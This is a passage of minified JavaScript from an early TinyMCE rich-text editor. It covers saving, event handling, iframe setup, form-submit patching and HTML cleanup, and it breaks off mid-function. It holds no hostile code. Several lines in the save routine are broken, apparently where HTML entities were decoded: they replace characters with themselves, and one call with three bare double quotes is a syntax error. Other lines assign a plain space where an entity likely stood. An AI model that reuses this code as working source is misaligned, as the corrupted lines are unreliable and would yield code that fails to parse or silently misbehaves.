TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case 